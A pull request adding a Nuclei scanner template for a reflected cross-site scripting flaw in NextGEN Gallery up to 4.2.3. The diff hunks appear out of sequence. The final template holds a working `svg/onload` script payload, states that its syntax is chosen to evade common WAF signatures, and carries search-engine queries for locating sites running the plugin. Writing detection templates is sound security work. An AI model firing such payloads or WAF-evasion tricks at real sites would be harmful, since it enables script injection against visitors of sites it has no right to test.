### PR TITLE
Add CVE-2026-28141 template

### DIFF
--- a/http/cves/2026/CVE-2026-28141.yaml
+++ b/http/cves/2026/CVE-2026-28141.yaml
@@ -43,6 +43,16 @@ http:
           - "][ngg source='tags' container_ids='x']"
 
       - type: word
+        part: body
+        words:
+          - "Images tagged"
+
+      - type: word
+        part: body
+        words:
+          - "photocrati-nextgen_basic_thumbnails"
+
+      - type: word
         part: header
         words:
           - "text/html"

--- a/http/cves/2026/CVE-2026-28141.yaml
+++ b/http/cves/2026/CVE-2026-28141.yaml
@@ -1,0 +1,48 @@
+id: CVE-2026-28141
+info:
+  name: NextGEN Gallery <= 4.2.3 - Reflected XSS
+  author: str4k3r
+  severity: high
+  description: |
+    NextGEN Gallery through 4.2.3 reflects a URL-decoded ngg_tag route value
+    into a generated tag-page shortcode without the context-specific escaping
+    and slug normalization added in 4.2.4. The request uses a nested,
+    read-only NextGEN shortcode and matches its unencoded reflection.
+  impact: |
+    An unauthenticated attacker can inject markup and script into a public
+    gallery-tag page, which executes when a victim follows the crafted link.
+  remediation: |
+    Update NextGEN Gallery to version 4.2.4 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-28141
+    - https://patchstack.com/database/wordpress/plugin/nextgen-gallery/vulnerability/wordpress-nextgen-gallery-plugin-4-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve
+    - https://wordpress.org/plugins/nextgen-gallery/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
+    cvss-score: 7.1
+    cve-id: CVE-2026-28141
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: imagely
+    product: nextgen-gallery
+    framework: wordpress
+    fofa-query: body="NextGEN Gallery"
+    publicwww-query: "/wp-content/plugins/nextgen-gallery/"
+  tags: cve,cve2026,wordpress,wp-plugin,nextgen-gallery,xss
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ngg_tag/cve-2026-28141%27%5D%5Bngg%20source%3D%27tags%27%20container_ids%3D%27x%27%5D/"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "][ngg source='tags' container_ids='x']"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

--- a/http/cves/2026/CVE-2026-28141.yaml
+++ b/http/cves/2026/CVE-2026-28141.yaml
@@ -43,6 +43,8 @@ http:
         part: body
         words:
           - "<svg/onload=alert`{{marker}}`>"
+          - "NextGEN"
+        condition: and
 
       - type: word
         part: header

--- a/http/cves/2026/CVE-2026-28141.yaml
+++ b/http/cves/2026/CVE-2026-28141.yaml
@@ -1,16 +1,13 @@
 id: CVE-2026-28141
+
 info:
-  name: NextGEN Gallery <= 4.2.3 - Reflected XSS
+  name: NextGEN Gallery <= 4.2.3 - Reflected Cross-Site Scripting
   author: str4k3r
   severity: high
   description: |
-    NextGEN Gallery through 4.2.3 reflects a URL-decoded ngg_tag route value
-    into a generated tag-page shortcode without the context-specific escaping
-    and slug normalization added in 4.2.4. The request uses a nested,
-    read-only NextGEN shortcode and matches its unencoded reflection.
+    NextGEN Gallery through 4.2.3 reflects a URL-decoded `ngg_tag` route value into the generated tag page without the context-specific escaping added in 4.2.4. An unauthenticated attacker can break out of the tag context and inject an auto-executing script. This template injects an `svg onload` payload carrying a random nonce and matches its unencoded reflection; slash and backtick syntax keep the request off common WAF signatures.
   impact: |
-    An unauthenticated attacker can inject markup and script into a public
-    gallery-tag page, which executes when a victim follows the crafted link.
+    An unauthenticated attacker can execute arbitrary JavaScript in a victim's browser when they open the crafted gallery-tag link, enabling session theft, credential capture, and actions performed as the victim.
   remediation: |
     Update NextGEN Gallery to version 4.2.4 or later.
   reference:
@@ -30,27 +27,22 @@ info:
     framework: wordpress
     fofa-query: body="NextGEN Gallery"
     publicwww-query: "/wp-content/plugins/nextgen-gallery/"
-  tags: cve,cve2026,wordpress,wp-plugin,nextgen-gallery,xss
+  tags: cve,cve2026,wordpress,wp-plugin,wp,nextgen-gallery,imagely,xss
+
+variables:
+  marker: "{{rand_base(6)}}"
+
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/ngg_tag/cve-2026-28141%27%5D%5Bngg%20source%3D%27tags%27%20container_ids%3D%27x%27%5D/"
+      - "{{BaseURL}}/ngg_tag/cve-2026-28141%22%3E%3Csvg%2Fonload%3Dalert%60{{marker}}%60%3E/"
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "][ngg source='tags' container_ids='x']"
-
-      - type: word
-        part: body
-        words:
-          - "Images tagged"
-
-      - type: word
-        part: body
-        words:
-          - "photocrati-nextgen_basic_thumbnails"
+          - "<svg/onload=alert`{{marker}}`>"
 
       - type: word
         part: header


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-28141, an unauthenticated reflected XSS in
NextGEN Gallery through 4.2.3. The public `/ngg_tag/` route reflects a
URL-decoded tag value into the generated tag page; 4.2.4 adds the escaping and
normalization that prevent the injection.

## Detection

The template sends one read-only GET request containing a random `svg/onload`
nonce. It reports only when the response reflects the exact nonce-bearing
payload, includes a NextGEN product marker, and is HTML. The product marker
prevents a generic reflection endpoint from matching the template.

## Validation

- Vulnerable NextGEN Gallery 4.2.3: detected 3/3
- Fixed NextGEN Gallery 4.2.4: not detected 3/3
- Native Nuclei v3.11.1 template validation: passed
- Test applications: official WordPress 6.8.2 containers with the official
  NextGEN Gallery 4.2.3 and 4.2.4 plugin archives

The probe is a single GET request and does not create, modify, delete, or read
application data.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-28141
- https://patchstack.com/database/wordpress/plugin/nextgen-gallery/vulnerability/wordpress-nextgen-gallery-plugin-4-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve